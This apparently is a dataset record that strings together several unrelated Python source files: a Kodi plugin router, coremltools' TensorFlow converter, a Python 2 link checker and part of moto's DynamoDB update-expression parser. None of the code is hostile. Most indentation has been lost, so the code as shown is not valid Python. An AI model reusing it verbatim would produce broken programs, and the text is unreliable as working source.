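    # {'action': 'listing', 'category': 'shows'} (illustrative values)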
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Load the videos for aci.
if params['category'] == "shows":
ATV.update_aci_shows()
print("Updated from main shows.")
elif params['category'] == "cable":
ATV.update_aci_cable()
print("Updated from main cable.")
elif params['category'] == "movies":
ATV.update_aci_movies()
print("Updated from main movies.")
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the provided paramstring does not contain a supported action
# we raise an exception. This helps to catch coding errors,
# e.g. typos in action names.
raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
else:
# Load ATV.
ATV.load_aci()
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
| 3.015625 | 3 |
coremltools/converters/mil/frontend/tensorflow/converter.py | VadimLevin/coremltools | 3 | 4929 | <filename>coremltools/converters/mil/frontend/tensorflow/converter.py
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import logging
from coremltools.converters.mil.input_types import (
InputType,
TensorType,
ImageType,
RangeDim,
_get_shaping_class,
)
from coremltools.converters.mil.input_types import Shape as InputShape
from coremltools.converters.mil.mil.var import Var
from coremltools.converters.mil.mil import get_new_symbol
from coremltools.converters.mil.mil.types.symbolic import is_symbolic
from coremltools.converters.mil.mil.types import is_tensor
from coremltools.converters.mil.mil import types
from .basic_graph_ops import topsort, simple_topsort
from .convert_utils import convert_graph
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import Program
from coremltools.converters.mil.mil import Function
from .ssa_passes.tf_passes import tensorflow_passes
from coremltools.converters._profile_utils import _profile
# TranscriptionContext maintains a map of tf_node.name --> ssa_var available
# to the current TF --> tfssa transcription.
class TranscriptionContext:
def __init__(self, name=None):
self.name = name if name is not None else ""
self.context = {}
self.graphs = {}
# TF loops are represented as functions, so nested loops becomes
# stacked functions. Stacked functions are translated to nested
# blocks in Program, like
#
# while_loop(loop_vars=(%a, %b))
# cond_block1(%a.x, %b.x) {
# ...some ops
# } -> (%bool_var1)
# body_block1(%a.x, %b.x) {
# %ret_axx = while_loop(loop_vars=(%a.x,))
# cond_block2(%a.x.x) {
# ...some ops
# } -> (%bool_var2)
# body_block2(%a.x.x) {
# ...some ops
# } -> (%new_a.x.x)
# } -> (%ret_axx)
# ....some ops using %ret_a
# } -> (%ret_ax, %ret_bx)
#
# During the translation of cond_block2, we'd have func_input_stack
#
# (%a.x.x,)
# (%a.x, %b.x)
#
# where [%a.x.x] would be unstacked once cond_block2 is done.
self.func_input_stack = [] # list of tuple[Var]
def add(self, tf_name, ssa_vars, is_new_var=True):
"""
ssa_vars: list[Var] / tuple[Var] (multiple outputs) or
Var (single_output)
is_new_var: True if ssa_vars are newly created for tf_name.
"""
if tf_name in self.context:
            # Overriding allows us to translate the while_loop body twice (which is
            # needed to figure out shape changes during iterations)
msg = "TF var %s is added again. Overriding previous value"
logging.info(msg % tf_name)
if is_new_var and isinstance(ssa_vars, Var) and tf_name != ssa_vars.name:
msg = (
"MIL op's name ({}) does not match TensorFlow's node name ({})."
" Warning: Node added to context must have the same name as the name passed to context."
)
raise ValueError(msg.format(tf_name, ssa_vars.name))
self.context[tf_name] = ssa_vars
def add_graph(self, graph_name, graph):
self.graphs[graph_name] = graph
def get_graph(self, graph_name):
if graph_name not in self.graphs:
msg = "Graph '{}' not found in: {}"
raise KeyError(msg.format(graph_name, list(self.graphs.keys())))
return self.graphs[graph_name]
def stack_func_inputs(self, inputs):
self.func_input_stack.append(inputs)
def unstack_func_inputs(self):
if len(self.func_input_stack) == 0:
raise ValueError("No func input available")
self.func_input_stack.pop()
def get_func_inputs(self):
if len(self.func_input_stack) == 0:
raise ValueError("No func input available")
return self.func_input_stack[-1]
def __getitem__(self, tf_name):
if tf_name not in self.context:
msg = "TF var {} not found in context {}"
raise KeyError(msg.format(tf_name, self.name))
return self.context[tf_name]
def __contains__(self, tf_name):
return tf_name in self.context
class TFConverter:
def __init__(self, tfssa, inputs=None, outputs=None, **kwargs):
"""
tfssa: TensorFlow IR.
inputs: list of TensorType or ImageType, optional, defaults to None.
outputs: list of str or str, optional, defaults to None.
A list of names of the output nodes or a str for single output name.
If None, the converter will try to extract the output information from
TensorFlow model.
"""
self.tfssa = tfssa
self.global_type = {}
self.inputs = None
main_func = tfssa.functions["main"]
graph = main_func.graph
# Filter the inputs to only Placeholder names
tf_placeholder_names = [n for n in graph if graph[n].op == "Placeholder"]
placeholder_names = []
if inputs is not None:
# Check inputs format
if not isinstance(inputs, (list, tuple)):
raise ValueError(
"Type of inputs should be list or tuple, got {} instead.".format(
type(inputs)
)
)
if not all([isinstance(i, InputType) for i in inputs]):
raise ValueError(
"Type of inputs should be list or tuple of TensorType or ImageType, got {} instead.".format(
[type(i) for i in inputs]
)
)
# Special case: if there's only 1 input and 1 placeholder, we match them.
if len(tf_placeholder_names) == 1 and len(inputs) == 1:
if inputs[0].name is None:
inputs[0].name = tf_placeholder_names[0]
            # filter out those inputs which are not in tf_placeholder_names
inputs = [x for x in inputs if x.name in tf_placeholder_names]
# We fill in shapes for user-specified input that doesn't have shape
for inp in inputs:
# Check inputs existence
if inp.name is None:
raise ValueError(
"Unable to infer input's name or input name was not provided"
)
if inp.name not in tf_placeholder_names:
raise ValueError(
"Input ({}) provided is not found in given tensorflow graph. Placeholders in graph are: {}".format(
inp.name, tf_placeholder_names
)
)
if inp.shape is None:
shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp.name)
# _get_shaping_class does not accept -1 or None dimension.
shape = [get_new_symbol() if s is None or s == -1 else s \
for s in shape]
inp.shape = _get_shaping_class(shape)
# Extract placeholders that users didn't specify.
user_input_names = [inp.name for inp in inputs]
for name in tf_placeholder_names:
if name not in user_input_names:
placeholder_names.append(name)
else:
inputs = []
placeholder_names = tf_placeholder_names
# name -> (shape, mil_type) mapping. shape has type list[int]
added_inputs = {}
for inp in main_func.inputs:
if inp not in placeholder_names:
continue
node = graph[inp]
dtype = node.attr['dtype']
shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp)
shape = [get_new_symbol() if s is None or s == -1 else s \
for s in shape]
inputs.append(TensorType(name=inp, shape=shape, dtype=dtype))
added_inputs[inp] = (shape, dtype)
if len(added_inputs) > 0:
logging.info(
"Adding Input not specified by users: '{}'".format(
added_inputs)
)
for idx, inp in enumerate(inputs):
# We set the default image format in TF as NHWC, since NHWC is used
# for TF unless GPU is specified as device.
if isinstance(inp, ImageType) and inputs[idx].channel_first is None:
inputs[idx].channel_first = False
self.inputs = tuple(inputs)
for inputtype in self.inputs:
if not isinstance(inputtype.shape, InputShape):
continue
if any([isinstance(s, RangeDim) for s in inputtype.shape.shape]):
continue
node = graph[inputtype.name]
shape = [-1 if is_symbolic(s) else s for s in inputtype.shape.shape]
node.attr["_output_shapes"] = [shape] # list of length 1
# infer outputs if not provided
self._validate_outputs(tfssa, outputs)
outputs = main_func.outputs if outputs is None else outputs
outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs]
outputs = [x if isinstance(x, str) else x.name for x in outputs]
self.outputs = outputs
# We would like a stack so that we run conversion sequentially.
self.graph_stack = self._get_stack(tfssa, root="main")
self.context = TranscriptionContext()
self.tensorflow_passes = tensorflow_passes
def _get_placeholder_shape_from_tf_graph(self, tfgraph, name):
error_message = "Unable to determine the shape of input: {}." \
" Please provide its shape during conversion, using \n" \
"'ct.convert(..., inputs=[ct.TensorType(name='{}', shape=(_FILL_ME_) ),])".format(name, name)
if tfgraph[name].attr.get("shape", None) is not None:
shape = tfgraph[name].attr["shape"]
elif tfgraph[name].attr.get("_output_shapes", None) is not None:
shape = tfgraph[name].attr["_output_shapes"][0]
if shape is None:
raise ValueError(error_message)
else:
raise ValueError(error_message)
return shape
def _get_stack(self, tfssa, root="main"):
        # We're trying to get an order of how to loop through the graphs.
# This is NOT necessarily a DAG.
dep = {x: [] for x in tfssa.functions}
for fname in tfssa.functions:
for node in tfssa.functions[fname].graph.values():
func_x, func_y = None, None
if node.op == "while":
func_x = node.attr["body_function"]
func_y = node.attr["cond_function"]
if func_x and fname not in dep[func_x]:
dep[func_x].append(fname)
if func_y and fname not in dep[func_y]:
dep[func_y].append(fname)
assert len(dep[root]) == 0
graph_stack = simple_topsort(dep)
return graph_stack
@staticmethod
def _get_tensor_name(tensor):
ret = None
if isinstance(tensor, str):
ret = tensor
else:
ret = tensor.name
return ret.split(":")[0]
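    # Example (illustrative): a tensor (or tensor name) "while/Exit:0" maps to
    # "while/Exit"; a plain node name without a ":<index>" suffix is returned unchanged.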
def _validate_outputs(self, tfssa, outputs):
if outputs is None:
return
outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs]
output_nodes = []
for f in tfssa.functions.values():
output_nodes += list(f.outputs)
all_nodes = []
for f in tfssa.functions.values():
all_nodes += list(f.graph.keys())
for n in outputs:
if self._get_tensor_name(n) not in output_nodes + all_nodes:
                raise KeyError('Output node name "{}" does not exist.'.format(n))
def check_placeholder_output(self, prog, outputs_name):
"""
Handle the cases where placeholder is output.
There is a case where the program is like
main(%Placeholder: (5,fp32)) {
block3() {
} -> (%Placeholder)
}
But self.outputs = ["Placeholder:0"]
We need to change the block output to Placeholder:0 by inserting an identity
"""
block = prog["main"]
input_name = [x.name for x in list(block.inputs.values())]
with block:
new_outputs = []
for output, output_name in zip(block.outputs, outputs_name):
if output.name not in input_name or output.name == output_name:
new_output = output
else:
new_output = mb.identity(x=output, name=output_name)
new_outputs.append(new_output)
block.set_outputs(new_outputs)
def convert_main_graph(self, prog, graph):
func_inputs = {}
for input_type in self.inputs:
func_inputs[input_type.name] = mb.placeholder(
input_type.shape.symbolic_shape, dtype=input_type.dtype)
prog.set_main_input_types(self.inputs)
with Function(func_inputs) as ssa_func:
# Get the input Var
for name in func_inputs.keys():
self.context.add(name, ssa_func.inputs[name])
outputs = convert_graph(self.context, graph, self.outputs)
ssa_func.set_outputs(outputs)
prog.add_function("main", ssa_func)
# check duplicate output
# Note: sometimes two outputs are pointing to the same Var, we should
# create mb.identity for those cases
block = prog["main"]
with block:
name_counts = {}
new_outputs = [output for output in block.outputs]
for i, v_o in enumerate(block.outputs):
if v_o.name not in name_counts:
name_counts[v_o.name] = 1
else:
name_counts[v_o.name] += 1
new_name = v_o.name + "_duplicate_" + str(name_counts[v_o.name])
x = mb.identity(x=v_o, name=new_name)
new_outputs[i] = x
block.set_outputs(new_outputs)
# Rename outputs to TF's name. This is needed when the last op doesn't
# generate a new Var (e.g., get_tuple, Identity etc.), and thus the
# last Var would have a different name than the last TF op's name.
#
# Example:
#
# TF code:
# x = tf.placeholder(tf.float32, shape=(1,))
# y = tf.placeholder(tf.float32, shape=(1,))
# c = lambda i, j: \
# tf.less(tf.math.reduce_mean(i), tf.math.reduce_mean(j))
# b = lambda i, j: (tf.add(i, 1), j)
# res = tf.while_loop(c, b, [x, y])
#
# Resulting nodes (excluding the nodes in while loop cond & body):
#
# node name: Placeholder op type: Placeholder inputs: []
# node name: Placeholder_1 op type: Placeholder inputs: []
# node name: make_input_0 op type: make_tuple inputs: ['Placeholder',
# 'Placeholder_1']
# node name: while_0 op type: while inputs: ['make_input_0']
# node name: while/Exit op type: get_tuple inputs: ['while_0']
# node name: while/Exit_1 op type: get_tuple inputs: ['while_0']
#
# Observe that return node `while/Exit` is an output from get_tuple,
# which in our translation simply unpack a python tuple of Vars
# ('while_0:0', 'while_0:1') returned from while_0 SSA op. We need to
# rename `while_0:0` to `while/Exit` in order for users to find the
# output.
# Note: only rename the output if the output is not Placeholder.
input_names = [x.name for x in self.inputs]
for v_o, out_name in zip(prog["main"].outputs, self.outputs):
if v_o.name != out_name and v_o.name not in input_names:
logging.info(
"Renaming output var: '{}' -> '{}'".format(v_o.name, out_name)
)
v_o.name = out_name
self.check_placeholder_output(prog, self.outputs)
@_profile
def convert(self):
prog = Program()
if len(self.graph_stack) == 0:
raise ValueError("At least one TF function must be present")
if self.graph_stack[0] != "main":
msg = "TF root graph must be named 'main'. Got {}"
raise ValueError(msg.format(self.graph_stack[0]))
graph = self.tfssa.functions["main"].graph
for g_name in self.graph_stack[1:]:
self.context.add_graph(g_name, self.tfssa.functions[g_name].graph)
self.convert_main_graph(prog, graph)
# Apply TF frontend passes on Program. These passes are different
# from passes applied to tfssa.
self.tensorflow_passes(prog)
return prog
| 1.8125 | 2 |
pylinkcheck.py | clayball/pylinkcheck | 0 | 4930 | <reponame>clayball/pylinkcheck<filename>pylinkcheck.py
#!/usr/bin/env python
# Copyright (c) 2016 <NAME>
#
# A Python-based link checker.
#
# Usage: pylinkcheck.py -r https://www.example.com
#
# By default, we can spider and check all of the links found at the URL's
# domain. For example, a check of https://foo.example.com will only check
# links with the base URL path of foo.example.com. Link found to
# bar.example.com will not be checked.
#
# Fancy run-time options
# url root (domain): this is simply required
# generate report file: -o output.txt, --output=output.txt
# limit depth: -l 2, --limit=2
# TODO: report format: --format=txt,html,xml
##############################################################################
import argparse
import urllib2
import csv
from datetime import datetime
import re
from urlparse import urlparse
from bs4 import BeautifulSoup
#######################################
# Functions
# Spider the base URL
def spiderURL(baseurl, pathlimit):
# build a list based on each sub directory found
print '[spider] path limit set to %d' % pathlimit
# Print an informative summary of the dead links
def printReport(deadlinks):
# print each item in the deadlinks list or CLEAN if empty
print '\n\n'
print '#' * 79
print ' Link Checker Results\n'
if not deadlinks:
print '[+] CLEAN: No dead links found'
else:
for item in deadlinks:
print '[-] NOT FOUND: %s' % item
#######################################
# Main program
#
# Get command line options
parser = argparse.ArgumentParser(description='A Python-based link checker.')
parser.add_argument('-f','--format', required=False, default='txt',
help='Output file format ')
parser.add_argument('-l','--limit', required=False, default=2, type=int,
                    help='Limit directory depth, example.com/limit/dir/depth/')
parser.add_argument('-u','--url', help='Base URL to check', required=True)
parser.add_argument('-o','--output', help='Output file name', required=False)
args = parser.parse_args()
# Assign program arguments to variables
# - we may want to add a '/' to baseurl if it's not present.
# - if the href links are relative we need to add the baseurl when checking
# the link.
baseurl = str(args.url)
pathlimit = int(args.limit)
# Show values
print 'Base URL: %s' % args.url
print 'Output file format: %s' % args.format
print 'Output file: %s' % args.output
print 'Limit spider: %d' % args.limit
# Grab today's date for timestamping output file.
now = datetime.now()
tstamp = now.strftime("%Y%m%d-%H%M")
# Grab all a href links
checkurl = urllib2.urlopen(baseurl).read()
soup = BeautifulSoup(checkurl, 'html.parser')
# Spider the site and build our list of URLs to check
spiderURL(baseurl, pathlimit)
deadlinks = []
# This for loop will completely change once the spiderURL function is working.
# We'll iterate over the various directory paths instead.
outofscope = 0
# Check the URLs
for link in soup("a"):
# Fetch the link but only return the status code
  # hrefs are unpredictable, so we could add a function to 'clean' them up,
  # i.e., get the proto, domain, path, and file (TODO: for a complete
  # solution we need to get all of this)
#if baseurl[:-1] == '/':
# print '[debug] strip last char from baseurl'
# mailto: is causing an error
href = link.get('href')
print '[debug] href: %s' % href
if re.match('^mailto', href):
# skip this one
continue
# Separate the file from the path
thisurl = urlparse(href)
if thisurl.netloc != baseurl and thisurl.netloc != '':
print '[-] HREF %s is out of scope' % thisurl.netloc
outofscope = 1
else:
print '[debug] path %s' % thisurl.path
outofscope = 0
# Build the full URL if the href is relative.
# - assuming, for now, other protocols are not desired
# - place this in the Spider function
try:
if re.match('^http', href):
checkurl = href
else:
checkurl = baseurl + href
except:
print '[-] Unknown error in re.match()'
try:
#print '[+] checking %s' % checkurl
hrefpage = urllib2.urlopen(checkurl)
except urllib2.HTTPError as e:
if e.code == 404:
print '[-] 404 ERROR: %s' % checkurl
# add this URL to deadlink list
deadlinks.append(checkurl)
else:
print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl)
except urllib2.URLError as e:
# Not an HTTP-specific error (e.g. connection refused)
    print '[-] NON-HTTP ERROR: %s - %s' % (e.reason, checkurl)
else:
print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl)
printReport(deadlinks)
# EOF | 2.734375 | 3 |
moto/dynamodb2/parsing/expressions.py | orenmazor/moto | 1 | 4931 | <reponame>orenmazor/moto
import logging
from abc import abstractmethod
import abc
import six
from collections import deque
from moto.dynamodb2.parsing.ast_nodes import (
UpdateExpression,
UpdateExpressionSetClause,
UpdateExpressionSetActions,
UpdateExpressionSetAction,
UpdateExpressionRemoveActions,
UpdateExpressionRemoveAction,
UpdateExpressionPath,
UpdateExpressionValue,
UpdateExpressionGroupedValue,
UpdateExpressionRemoveClause,
ExpressionPathDescender,
ExpressionSelector,
ExpressionAttribute,
ExpressionAttributeName,
ExpressionAttributeValue,
ExpressionValueOperator,
UpdateExpressionFunction,
UpdateExpressionAddClause,
UpdateExpressionAddActions,
UpdateExpressionAddAction,
UpdateExpressionDeleteAction,
UpdateExpressionDeleteActions,
UpdateExpressionDeleteClause,
)
from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression
from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer
class NestableExpressionParserMixin(object):
"""
For nodes that can be nested in themselves (recursive). Take for example UpdateExpression's grammar:
UpdateExpression => UpdateExpressionClause*
UpdateExpression => UpdateExpressionClause* UpdateExpression
If we consider it of structure
NestableExpression => TargetClause*
NestableExpression => TargetClause* NestableExpression
This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern.
    This approach is taken since it preserves the ordering of the Nodes as the corresponding tokens appeared
    in the originating expression.
"""
def __init__(self, *args, **kwargs):
self.target_clauses = deque()
def _parse_target_clause(self, factory_class):
"""
Args:
factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser
Returns:
"""
logging.debug(
"Move token pos {pos} to continue parsing with specific factory class {fc}".format(
pos=self.token_pos, fc=factory_class.__class__.__name__
)
)
# noinspection PyProtectedMember
ast, token_pos = factory_class(**self._initializer_args())._parse_with_pos()
self.target_clauses.append(ast)
logging.debug(
"Continue where previous parsing ended {token_pos}".format(
token_pos=token_pos
)
)
self.token_pos = token_pos
@abstractmethod
def _initializer_args(self):
"""
Get the arguments of the initializer. This is implemented by the calling class. See ExpressionParser for an
example.
Returns:
dict: A dictionary of the initializer arguments
"""
@classmethod
@abstractmethod
def _nestable_class(cls):
"""
        Get the class of the Node that will be created and nested. For the example in the docstring this would
be UpdateExpression
Returns:
class: The class of the Nodes that will be created.
"""
def _create_node(self):
"""
        target_clauses has the nodes in the order they were encountered. Go through them backwards and build the tree bottom up.
This way left-deep-descending traversal will process nodes in order.
Continuing the example of an UpdateExpression:
For example SET a=3 REMOVE b
UpdateExpression
/ \
SET a=3 UpdateExpression
|
REMOVE b
self.target_clauses looks like: ( SET a=3 >> REMOVE b )
Returns:
moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory.
"""
assert len(self.target_clauses) > 0, "No nodes for {cn}".format(
cn=self.__class__.__name__
)
target_node = self._nestable_class()(children=[self.target_clauses.pop()])
while len(self.target_clauses) > 0:
target_node = self._nestable_class()(
children=[self.target_clauses.pop(), target_node]
)
return target_node
@six.add_metaclass(abc.ABCMeta)
class ExpressionParser:
"""Abstract class"""
def __init__(self, expression_token_list, token_pos=0):
"""
Args:
expression_token_list:
token_pos(int): Location where parsing is
"""
self.token_list = expression_token_list
self.token_pos = token_pos
def _initializer_args(self):
return {"expression_token_list": self.token_list, "token_pos": self.token_pos}
@abstractmethod
def _parse(self):
"""
Start parsing the token_list from token_pos for the factory type.
Returns:
moto.dynamodb2.ast_nodes.Node: AST which is root node of resulting abstract syntax tree
"""
@classmethod
def is_possible_start(cls, token):
return token is not None and cls._is_possible_start(token)
@classmethod
@abstractmethod
def _is_possible_start(cls, token):
"""
Args:
token(moto.dynamodb2.tokens.Token):
Returns:
bool: True if token is a possible start for entries processed by `cls`
"""
def _parse_with_pos(self):
"""
Start parsing the token_list from token_pos for the factory type and also return the resulting token_pos.
Returns:
(ast, token_pos): tuple of AST which is root node of resulting abstract syntax tree and token_pos is the
position in the tokenlist.
"""
return self._parse(), self.token_pos
def parse(self):
return self._parse()
def get_next_token_type(self):
"""
Get the type of the next token to be processed
Returns:
str: Token type or None if no more next token
"""
try:
return self.get_next_token().type
except AttributeError:
return None
def get_next_token(self):
"""
Get the next token to be processed
Returns:
moto.dynamodb2.tokens.Token: or None if no more next token
"""
try:
return self.token_list[self.token_pos]
except IndexError:
return None
def get_next_token_value(self):
"""
Get the value of the next token to be processed
Returns:
str: value or None if no more next token
"""
try:
return self.get_next_token().value
except AttributeError:
return None
def is_at_end(self):
"""Return boolean indicating whether we are at end of the parsing"""
return self.token_pos == len(self.token_list)
def is_at_start(self):
"""Return boolean indicating whether we are at start of the parsing"""
return self.token_pos == 0
def get_last_token_value(self):
"""Get the last token that was correctly parsed or return empty string"""
if self.token_pos > 0:
return self.token_list[self.token_pos - 1].value
else:
return ""
def get_last_token_type(self):
"""Get the last token type that was correctly parsed or return None"""
if self.token_pos > 0:
return self.token_list[self.token_pos - 1].type
else:
return None
def get_2nd_last_token_value_if_last_was_whitespace(self):
"""Get the 2nd last token that was correctly parsed if last one was whitespace or return empty string"""
if self.token_pos > 1 and self.get_last_token_type() == Token.WHITESPACE:
return self.token_list[self.token_pos - 2].value
else:
return ""
def get_following_token_value(self):
"""Get the token value after the one that is being parsed or empty string if non existent."""
try:
return self.token_list[self.token_pos + 1].value
except IndexError:
return ""
def get_following_token_type(self):
"""Get the token type after the one that is being parsed or None if non existent."""
try:
return self.token_list[self.token_pos + 1].type
except IndexError:
return None
def get_2nd_following_token_value_if_following_was_whitespace(self):
"""Get the 2nd following token that was correctly parsed if 1st one was whitespace or return empty string"""
if self.get_following_token_type() == Token.WHITESPACE:
try:
return self.token_list[self.token_pos + 2].value
except IndexError:
return ""
else:
return ""
def skip_white_space(self):
try:
while self.get_next_token_type() == Token.WHITESPACE:
self.token_pos += 1
except IndexError:
assert self.token_pos > 0, "We should always have positive indexes"
logging.debug("We are out of range so end is reached")
def process_token_of_type(self, token_type):
"""
        Make sure the next token is of type `token_type`; if not, raise an unexpected-token error.
Args:
token_type: A token type
Returns:
str: The value if the token is of type `token_type`
"""
if self.get_next_token_type() == token_type:
token_value = self.get_next_token_value()
self.goto_next_significant_token()
return token_value
else:
self.raise_unexpected_token()
def goto_next_significant_token(self):
"""Continue past current token and skip all whitespaces"""
self.token_pos += 1
self.skip_white_space()
def raise_unexpected_token(self):
if self.is_at_end():
problematic_token = "<EOF>"
problematic_token_in_near = ""
else:
problematic_token_in_near = problematic_token = self.get_next_token_value()
near = "".join(
[
self.get_2nd_last_token_value_if_last_was_whitespace(),
self.get_last_token_value(),
problematic_token_in_near,
self.get_following_token_value(),
self.get_2nd_following_token_value_if_following_was_whitespace(),
]
)
raise InvalidTokenException(problematic_token, near)
class NestableBinExpressionParser(ExpressionParser):
"""
For nodes that can be nested in themselves (recursive) but with an operation. Take for example
UpdateExpressionValue's grammar:
Value => Operand*
Value => Operand* + Value
Value => Operand* - Value
If we consider it of structure
NestableBinExpression => TargetClause*
NestableBinExpression => TargetClause* BinOp NestableBinExpression
This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern.
    This approach is taken since it preserves the ordering of the Nodes as the corresponding tokens appeared
    in the originating expression.
"""
def __init__(self, *args, **kwargs):
super(NestableBinExpressionParser, self).__init__(*args, **kwargs)
self.target_nodes = deque()
def _parse_target_clause(self, factory_class):
"""
Args:
factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser
Returns:
"""
# noinspection PyProtectedMember
ast, self.token_pos = factory_class(
**self._initializer_args()
)._parse_with_pos()
self.target_nodes.append(ast)
logging.debug(
"Continue where previous parsing ended {token_pos}".format(
token_pos=self.token_pos
)
)
def _parse(self):
self._parse_target_clause(self._operand_factory_class())
while self._binop_factory_class().is_possible_start(self.get_next_token()):
self._parse_target_clause(self._binop_factory_class())
if self._operand_factory_class().is_possible_start(self.get_next_token()):
self._parse_target_clause(self._operand_factory_class())
else:
self.raise_unexpected_token()
return self._create_node()
@abstractmethod
def _operand_factory_class(self):
"""
Get the Parser class of the Operands for the Binary operations/actions.
Returns:
class:
"""
@abstractmethod
def _binop_factory_class(self):
"""
Get a factory that gets the possible binary operation.
Returns:
class: A class extending ExpressionParser
"""
def _create_node(self):
"""
        target_nodes has the nodes in the order they were encountered. Go through them forward and build the tree bottom up.
        For simplicity this docstring uses Operand rather than the specific node type.
This way left-deep-descending traversal will process nodes in order.
Continuing the example of an UpdateExpressionValue:
For example value => a + :val - :val2
UpdateExpressionValue
/ | \
UpdateExpressionValue BinOp Operand
/ | | | |
UpdateExpressionValue BinOp Operand - :val2
/ | |
Operand + :val
|
a
self.target_nodes looks like: ( a >> + >> :val >> - >> :val2 )
Returns:
moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory.
"""
if len(self.target_nodes) == 1:
return UpdateExpressionValue(children=[self.target_nodes.popleft()])
else:
target_node = UpdateExpressionValue(
children=[
self.target_nodes.popleft(),
self.target_nodes.popleft(),
self.target_nodes.popleft(),
]
)
while len(self.target_nodes) >= 2:
target_node = UpdateExpressionValue(
children=[
target_node,
self.target_nodes.popleft(),
self.target_nodes.popleft(),
]
)
assert len(self.target_nodes) == 0
return target_node
class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin):
"""
Parser to create update expressions
"""
@classmethod
def _sub_factories(cls):
return [
UpdateExpressionSetClauseParser,
UpdateExpressionAddClauseParser,
UpdateExpressionDeleteClauseParser,
UpdateExpressionRemoveClauseParser,
]
@classmethod
def _is_possible_start(cls, token):
pass
def __init__(self, *args, **kwargs):
super(UpdateExpressionParser, self).__init__(*args, **kwargs)
NestableExpressionParserMixin.__init__(self)
@classmethod
def _nestable_class(cls):
return UpdateExpression
def _parse_expression_clause(self, factory_class):
return self._parse_target_clause(factory_class)
def _parse_by_a_subfactory(self):
for sub_factory in self._sub_factories():
if sub_factory.is_possible_start(self.get_next_token()):
self._parse_expression_clause(sub_factory)
return True
return False
def _parse(self):
"""
Update Expression is the top-most node therefore it is expected to end up at the end of the expression.
"""
while True:
self.skip_white_space()
if self.is_at_end():
logging.debug("End reached")
break
elif self._parse_by_a_subfactory():
continue
else:
self.raise_unexpected_token()
return self._create_node()
@classmethod
def make(cls, expression_str):
token_list = ExpressionTokenizer.make_list(expression_str)
return cls(token_list).parse()
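# Example usage (hedged sketch; the expression and names are illustrative):
#   ast = UpdateExpressionParser.make("SET a = :val REMOVE b")
# returns the root UpdateExpression node, with an UpdateExpressionSetClause and an
# UpdateExpressionRemoveClause nested per the grammar described above.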
class UpdateExpressionSetClauseParser(ExpressionParser):
"""
UpdateExpressionSetClause => SET SetActions
"""
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE and token.value.upper() == "SET"
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionSetActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionSetClause(children=[ast])
class UpdateExpressionActionsParser(ExpressionParser, NestableExpressionParserMixin):
"""
    Abstract base parser for a list of UpdateExpression actions.
"""
def __init__(self, *args, **kwargs):
super(UpdateExpressionActionsParser, self).__init__(*args, **kwargs)
NestableExpressionParserMixin.__init__(self)
@classmethod
def _is_possible_start(cls, token):
raise RuntimeError(
"{class_name} cannot be identified by the next token.".format(
class_name=cls._nestable_class().__name__
)
)
@classmethod
@abstractmethod
def _nestable_class(cls):
return UpdateExpressionSetActions
@classmethod
@abstractmethod
def _nested_expression_parser_class(cls):
"""Returns the parser for the query part that creates the nested nodes"""
def _parse(self):
"""
UpdateExpressionSetActions is inside the expression so it can be followed by others. Process SetActions one by
one until no more SetAction.
"""
self.skip_white_space()
while self._nested_expression_parser_class().is_possible_start(
self.get_next_token()
):
self._parse_target_clause(self._nested_expression_parser_class())
self.skip_white_space()
if self.get_next_token_type() == Token.COMMA:
self.goto_next_significant_token()
else:
break
if len(self.target_clauses) == 0:
logging.debug(
"Didn't encounter a single {nc} in {nepc}.".format(
nc=self._nestable_class().__name__,
nepc=self._nested_expression_parser_class().__name__,
)
)
self.raise_unexpected_token()
return self._create_node()
class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionSetActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionSetActions
class UpdateExpressionSetActionParser(ExpressionParser):
"""
SetAction => Path = Value
So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value.
"""
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
"""
UpdateExpressionSetActionParser only gets called when expecting a SetAction. So we should be aggressive on
raising invalid Tokens. We can thus do the following:
1) Process path
2) skip whitespace if there are any
3) Process equal-sign token
4) skip whitespace if there are any
3) Process value
"""
path, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
self.process_token_of_type(Token.EQUAL_SIGN)
self.skip_white_space()
value, self.token_pos = UpdateExpressionValueParser(
**self._initializer_args()
)._parse_with_pos()
return UpdateExpressionSetAction(children=[path, value])
class UpdateExpressionPathParser(ExpressionParser):
"""
    Paths are selectors within items that specify a part of an Item. DynamoDB does not impose many restrictions on the
    data it stores, but it does impose stricter restrictions on how attributes are referenced in an UpdateExpression.
"""
def __init__(self, *args, **kwargs):
super(UpdateExpressionPathParser, self).__init__(*args, **kwargs)
